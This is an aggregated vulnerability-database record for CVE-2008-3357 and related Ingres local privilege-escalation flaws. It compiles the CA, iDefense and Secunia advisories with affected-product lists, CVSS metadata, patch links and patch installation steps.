The release identifier will be as follows: Operating System Release identifier HP Sparc 32/64bit II 3.0.3 (hp2.us5/211) HP Itanium II 3.0.3 (i64.hpu/211) Intel Solaris 32/64bit II 3.0.3 (a64.sol/211) AIX 32/64bit II 3.0.3 (r64.us5/211) Solaris 32/64bit II 3.0.3 (su9.us5/211) AMD Linux II 3.0.3 (a64.lnx/211) Intel Linux II 3.0.3 (int.lnx/103) Itanium Linux II 3.0.3 (i64.lnx/211)
Important: For Linux (AMD, Intel and Itanium) platforms, after applying the build provided on this page, please download and apply the maintenance update. For the other platforms, the builds are patched to the latest maintenance update. Note: 1. If the release you are using is already 3.0.3 build 103 on Linux and 3.0.3 build 211 on Unix, then download and install the maintenance update. 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.
For these products: CA ARCserve Backup for Unix r11.1 CA ARCserve Backup for Unix r11.5 GA/SP1/SP2 CA ARCserve Backup for Unix r11.5 SP3 CA ARCserve Backup for Linux r11.1 EEM 8.1 eTrust Audit/SCC 8.0 sp2 NSM 3.0 0305 NSM 3.1 0403 NSM r3.1 SP1 0703 Unicenter Service Catalog r2.2 Unicenter ServicePlus Service Desk 6.0
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
The release identifier will be as follows: Operating System Release identifier AIX 32bit II 2.6/xxxx (rs4.us5/00) AIX 64bit II 2.6/xxxx (r64.us5/00) HP-UX Itanium II 2.6/xxxx (i64.hpu/00) HP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00) HP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)DBL HP-UX RISC 64bit II 2.6/xxxx (hp2.us5/00) HP Tru64 UNIX II 2.6/xxxx (axp.osf/00) Linux AMD64 II 2.6/xxxx (a64.lnx/00) Linux Intel 32bit II 2.6/xxxx (int.lnx/00) Linux Intel 32bit II 2.6/xxxx (int.lnx/00)DBL Linux Intel 32bit II 2.6/xxxx (int.lnx/00)LFS Linux Itanium II 2.6/xxxx (i64.lnx/00) Linux S/390 II 2.6/xxxx (ibm.lnx/00) Solaris SPARC 32bit II 2.6/xxxx (su4.us5/00) Solaris SPARC 32bit double II 2.6/xxxx (su4.us5/00)DBL Solaris SPARC 64bit II 2.6/xxxx (su9.us5/00)
Note: 1. If the Ingres release embedded in your product is not 2.6, please get the appropriate update here. 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support. 3. For HP-UX platform with CA ARCserve Backup 11.1 or 11.5/GA/SP1/SP2/SP3, download the published ARCserve fix, RO01277: https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&actionID=3 and follow the enclosed instructions to install the security patch.
Workaround: None
References (URLs may wrap): CA Support: http://support.ca.com/ Security Notice for CA Products That Embed Ingres https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989 Solution Document Reference APARs: RO01277 (ARCserve only) CA Security Response Blog posting: CA Products That Embed Ingres Multiple Vulnerabilities community.ca.com/blogs/casecurityresponseblog/archive/2008/08/06.aspx Reported By: iDefense Labs Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731 Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732 Ingres Database for Linux ingvalidpw Untrusted Library Path Vulnerability http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733 Ingres Security Vulnerability Announcement as of August 01, 2008 http://www.ingres.com/support/security-alert-080108.php CVE References: CVE-2008-3356 - Ingres verifydb file create permission override. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3356 CVE-2008-3357 - Ingres un-secure directory privileges with utility ingvalidpw. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3357 CVE-2008-3389 - Ingres verifydb, iimerge, csreport buffer overflow. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3389 OSVDB References: Pending http://osvdb.org/
Changelog for this advisory: v1.0 - Initial Release
Customers who require additional information should contact CA Technical Support at http://support.ca.com.
For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.
If you discover a vulnerability in CA products, please report your findings to our product security response team. https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams ; 0xE2941985 Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2008 CA. All rights reserved. iDefense Security Advisory 08.01.08 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 01, 2008
I. BACKGROUND
Ingres Database is a database server used in several Computer Associates' products. For example, CA Directory Service use thes Ingres Database server. More information can be found on the vendor's website at the following URL.
http://ingres.com/downloads/prod-cert-download.php
II.
The vulnerability exists within the "ingvalidpw" utility included with Ingres database. This utility is used to verify a user's credentials, and is installed set-uid root. When loading shared libraries, the "ingvalidpw" program will load libraries from a directory owned by the "ingres" user.
III. By itself, this is not that serious of a vulnerability.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in Ingres 2006 Enterprise Edition Release 2 for Linux x86 (32-bit). Other versions may also be affected.
V. WORKAROUND
iDefense is currently unaware of any workarounds for this issue.
VI. VENDOR RESPONSE
"This problem has been identified and resolved by Ingres in the following releases: Ingres 2006 release 2 (9.1.0), Ingres 2006 release 1 (9.0.4), and Ingres 2.6."
For more information, refer to Ingres' advisory at the following URL.
http://www.ingres.com/support/security-alert-080108.php
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3357 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
07/20/2007 Initial vendor response 07/23/2007 Initial vendor notification 08/01/2008 Coordinated public disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2008 iDefense, Inc.
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ----------------------------------------------------------------------
Want a new job?
http://secunia.com/secunia_security_specialist/ http://secunia.com/hardcore_disassembler_and_reverse_engineer/
International Partner Manager - Project Sales in the IT-Security Industry: http://corporate.secunia.com/about_secunia/64/
TITLE: Ingres Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA31357
VERIFY ADVISORY: http://secunia.com/advisories/31357/
CRITICAL: Less critical
IMPACT: Privilege escalation
WHERE: Local system
SOFTWARE: Ingres 2.x http://secunia.com/product/14576/ Ingres 2006 (9.x) http://secunia.com/product/14574/
DESCRIPTION: Some vulnerabilities have been reported in Ingres, which can be exploited by malicious, local users to gain escalated privileges.
1) An error exists in the "verifydb" utility due to improperly changing permissions on files and having the setuid-bit set (owned by the "ingres" user).
2) A boundary error exists within the "libbecompat" library that is used by several of the setuid "ingres" utilities. This can be exploited to cause a stack-based buffer overflow e.g. via a specially crafted environmental variable.
SOLUTION: The vendor has issued fixes. Please see the knowledge base document (customer login required). http://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:416012+HTMPL=kt_document_view.htmpl
PROVIDED AND/OR DISCOVERED BY: An anonymous researcher, reported via iDefense.
ORIGINAL ADVISORY: Ingres: http://www.ingres.com/support/security-alert-080108.php
iDefense: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732 http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200808-0319",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ingres",
"scope": "eq",
"trust": 1.4,
"vendor": "ingres",
"version": "2.6"
},
{
"model": "ingres",
"scope": "eq",
"trust": 1.0,
"vendor": "actian",
"version": "2.6"
},
{
"model": "ingres",
"scope": "eq",
"trust": 1.0,
"vendor": "actian",
"version": "9.1.0"
},
{
"model": "ingres",
"scope": "eq",
"trust": 1.0,
"vendor": "actian",
"version": "9.0.4"
},
{
"model": "ingres",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "2006 release 1"
},
{
"model": "ingres",
"scope": "eq",
"trust": 0.8,
"vendor": "ingres",
"version": "and 2006 release 2"
},
{
"model": "ingres",
"scope": "eq",
"trust": 0.6,
"vendor": "ingres",
"version": "2006"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20069.1"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20069.0.4"
},
{
"model": "database",
"scope": "eq",
"trust": 0.3,
"vendor": "ingres",
"version": "20060"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter software delivery",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "6.0"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter serviceplus service desk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates unicenter service metric analysis",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates unicenter service catalog",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.2"
},
{
"model": "associates unicenter asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates single sign-on",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates nsm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates job management option",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.0"
},
{
"model": "associates identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12"
},
{
"model": "associates etrust audit/scc sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.2.1"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.2"
},
{
"model": "associates eem",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates directory",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.2"
},
{
"model": "associates cleverpath aion bpm",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.1"
},
{
"model": "associates ca arcserve backup for unix ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for unix sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for unix sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates advantage data transformer",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.2"
},
{
"model": "associates admin",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-049"
},
{
"db": "NVD",
"id": "CVE-2008-3357"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:ingres:ingres",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "iDEFENSE",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-049"
}
],
"trust": 0.6
},
"cve": "CVE-2008-3357",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2008-3357",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2008-3357",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2008-3357",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-200808-049",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004682"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-049"
},
{
"db": "NVD",
"id": "CVE-2008-3357"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Untrusted search path vulnerability in ingvalidpw in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and HP-UX allows local users to gain privileges via a crafted shared library, related to a \"pointer overwrite vulnerability.\". Ingres Database is prone to multiple local vulnerabilities:\n- Multiple local privilege-escalation vulnerabilities\n- A vulnerability that may allow attackers to overwrite arbitrary files. \nLocal attackers can exploit these issues to gain elevated privileges on the affected computer, execute arbitrary code with superuser privileges, and overwrite arbitrary files owned by \u0027Ingres\u0027 user. \nTitle: CA Products That Embed Ingres Multiple Vulnerabilities\n\n\nCA Advisory Date: 2008-08-01\n\n\nReported By: iDefense Labs\n\n\nImpact: A remote attacker can execute arbitrary code, gain \nprivileges, or cause a denial of service condition. \n\n\nSummary: CA products that embed Ingres contain multiple \nvulnerabilities that can allow a remote attacker to execute \narbitrary code, gain privileges, or cause a denial of service \ncondition. These vulnerabilities exist in the products and on the \nplatforms listed below. These vulnerabilities do not impact any \nWindows-based Ingres installation. The first vulnerability, \nCVE-2008-3356, allows an unauthenticated attacker to potentially \nset the user and/or group ownership of a verifydb log file to be \nIngres allowing read/write permissions to both. The third \nvulnerability, CVE-2008-3389, allows an unauthenticated attacker \nto obtain ingres user privileges. However, when combined with the \nunsecured directory privileges vulnerability (CVE\u20132008-3357), root \nprivileges can be obtained. \n\n\nMitigating Factors: These vulnerabilities do not impact any \nWindows-based Ingres installation. \n\n\nSeverity: CA has given these vulnerabilities a High risk rating. \n\n\nAffected Products:\nAdmin r8.1 SP2\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nCA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3\nCA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nCleverPath Aion BPM r10.1, r10.2\nEEM 8.1, 8.2, 8.2.1\neTrust Audit/SCC 8.0 sp2\nIdentity Manager r12\nNSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11\nUnicenter Asset Management r11.1, r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r2.2, r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2\nUnicenter Software Delivery r11.1, r11.2\nUnicenter Workload Control Center r11\n\n\nAffected Platforms:\n1. Ingres verifydb file create permission override (CVE-2008-3356)\n This vulnerability impacts all platforms except Windows. \n2. Ingres un-secure directory privileges with utility ingvalidpw \n (CVE - 2008-3357)\n This vulnerability impacts only Linux and HP platforms. \n3. Ingres verifydb, iimerge, csreport buffer overflow \n (CVE-2008-3389)\n This vulnerability impacts only Linux and HP platforms. \n\n\nStatus and Recommendation:\nThe most prudent course of action for affected customers is to \ndownload and apply the corrective maintenance. However, updates \nare provided only for the following releases: 2.6 and r3\n\nImportant: Customers using products that embed an earlier version \nof Ingres r3 should upgrade Ingres to the release that is \ncurrently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX \nplatforms) before applying the maintenance updates. Please contact \nyour product\u0027s Technical Support team for more information. \n\nFor these products:\nAdmin r8.1 SP2\nCA ARCserve Backup for Linux r11.5 SP2/SP3\nCA Directory r8.1\nCA Job Management Option R11.0\nCA Single Sign-On r8.1\nEEM 8.2\nEEM 8.2.1\nIdentity Manager r12\nNSM r11\nUnicenter Asset Management r11.1\nUnicenter Asset Management r11.2\nUnicenter Remote Control r11.2\nUnicenter Service Catalog r11.1\nUnicenter Service Metric Analysis r11.1\nUnicenter ServicePlus Service Desk r11\nUnicenter ServicePlus Service Desk r11.1\nUnicenter ServicePlus Service Desk r11.2\nUnicenter Software Delivery r11.1\nUnicenter Software Delivery r11.2\nUnicenter Workload Control Center r11\n\nApply the update below that is listed for your platform (note that \nURLs may wrap):\n\nAIX [3.0.3 (r64.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z\n\nHP-UX Itanium [3.0.3 (i64.hpu/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z\n\nHP-UX RISC [3.0.3 (hp2.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z\n\nLinux AMD [3.0.3 (a64.lnx/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z\n\nLinux Intel 32bit [3.0.3 (int.lnx/103)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z\n\nLinux Itanium [3.0.3 (i64.lnx/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z\n\nSolaris SPARC [3.0.3 (su9.us5/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z\n\nSolaris x64/x86 [3.0.3 (a64.sol/211)]\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z\n\nIngres r3 Vulnerability Updates Install Steps (August 1, 2008)\n\nUnix/Linux:\n1. Log on to your system using the installation owner account and \n make sure the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres system files\n 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility \n directories. \n2. Change directory to the root directory of the Ingres \n installation or use a previously created directory. \n cd $II_SYSTEM/ingres\n or\n cd \u003cpatch_directory\u003e\n3. Copy the download maintenance update file in to the current \n directory and uncompress\n4. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This will create the directory:\n $II_SYSTEM/ingres/patchXXXXX\n or\n \u003cpatch_directory\u003e/patchXXXXX\n Note: \u2018XXXXX\u0027 in patchXXXXX refers to the update number\n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Change directory to the patch directory:\n cd patchXXXXX\n7. Within the patch directory run the following command:\n ./utility/iiinstaller\n Please check the $II_SYSTEM/ingres/files/patch.log file to \n make sure the patch was applied successfully. Also check the \n $II_SYSTEM/ingres/version.rel to make sure the patch is \n referenced. \n Note: The patch can also be installed silently using the \u2018-m\u0027 \n flag with iiinstaller:\n ./utility/iiinstaller -m\n8. Once the patch install has been complete, re-link the iimerge \n binary with the following command:\n iilink\n9. Ingres can then be restarted with the \u2018ingstart\u0027 utility:\n ingstart\n\nFor these products:\nAdvantage Data Transformer r2.2\nAllfusion Harvest Change Manager r7.1\nARCserve for Linux r11.5 GA/SP1\nCleverPath Aion BPM r10.1\nCleverPath Aion BPM r10.2\n\nApply the build below that is listed for your platform (note that \nURLs may wrap):\n\nAIX\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12833-r64-us5.tar\n\nHP-UX Itanium\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12831-i64-hpu.tar\n\nHP-UX RISC\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12830-hp2-us5.tar\n\nLinux AMD EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-x86_64.tar.gz\n\nLinux AMD II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-x86_64.tgz\n\nLinux Intel EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-EI-linux-i386.tgz\n\nLinux Intel II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-pc-linux-i386.tgz\n\nLinux Itanium EI build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-ia64.tar.gz\n\nLinux Itanium II build\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-ia64.tgz\n\nSolaris SPARC\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12834-su9-us5.tar\n\nSolaris x64/x86\nftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12832-a64-sol.tar\n\nIngres r3 Build Install Steps (August 1, 2008)\n\nImportant: Prior to installing the build, a full operating system \nbackup of the $II_SYSTEM/ingres directory on Unix/Linux and \n%II_SYSTEM%\\ingres directory on Windows must be taken with Ingres \ncompletely shut down. Also, a backup of any other DATA locations \nthat you may have must be taken, again with Ingres shut down. In \ncase there is a problem with the update install, this allows \nIngres to be restored from the backup. \n\nUnix:\n1. Log in to the system as the installation owner and make sure \n the environment is set up correctly:\n 1. II_SYSTEM must be set to the Ingres home directory\n 2. PATH must include $II_SYSTEM/ingres/bin and \n $II_SYSTEM/ingres/utility directories\n 3. Add $II_SYSTEM/ingres/lib to the shared library path\n 4. Set TERM to \u2018vt100\u0027 and TERM_INGRES to \u2018vt100fx\u0027\n2. Copy the downloaded update file to the /tmp directory and \n uncompress\n3. Read in the update file with the following commands:\n umask 022\n tar xf [update_file]\n This creates a directory containing the distribution and \n other files. \n4. Stop all applications that may be connected to or using any of \n the files in the Ingres instance. \n5. Stop all Ingres processes with the \u2018ingstop\u0027 utility:\n ingstop\n6. Important: Take an operating system backup of the \n $II_SYSTEM/ingres directory and other DATA locations that you \n may have elsewhere. Also, copy the \n $II_SYSTEM/ingres/files/config.dat and \n $II_SYSTEM/ingres/files/symbol.tbl files to a safe location to \n ensure that the configuration can be restored. \n7. From the root directory of the Ingres installation \n ($II_SYSTEM/ingres), run the following command:\n tar xf /tmp/\u003cupdate_directory\u003e/ingres.tar install\n8. Run the following command:\n install/ingbuild\n9. The initial install screen appears. \n10. In the Distribution medium enter the full path to the \n \u2018ingres.tar\u0027 file (including the file) (See step 4). \n11. Choose PackageInstall from the list of installation options \n and then choose \u2018Stand alone DBMS Server\u0027 from the list of \n packages. Then choose ExpressInstall. \n12. Choose Yes in the pop-up screen and press Enter key. \n The install utility verifies that each component was \n transferred properly from the distribution medium. When this \n is finished (without errors), another pop-up screen for \n setting up the components comes up. \n13. Select Yes and press Enter key to go to the Setup program. \n14. Once the installation is complete, check the \n $II_SYSTEM/ingres/files/install.log for any errors. Also, \n check the $II_SYSTEM/ingres/version.rel file to verify the new \n build is referenced; this should show 3.0.3 for the build. \n15. If there are no errors, then restore the \n 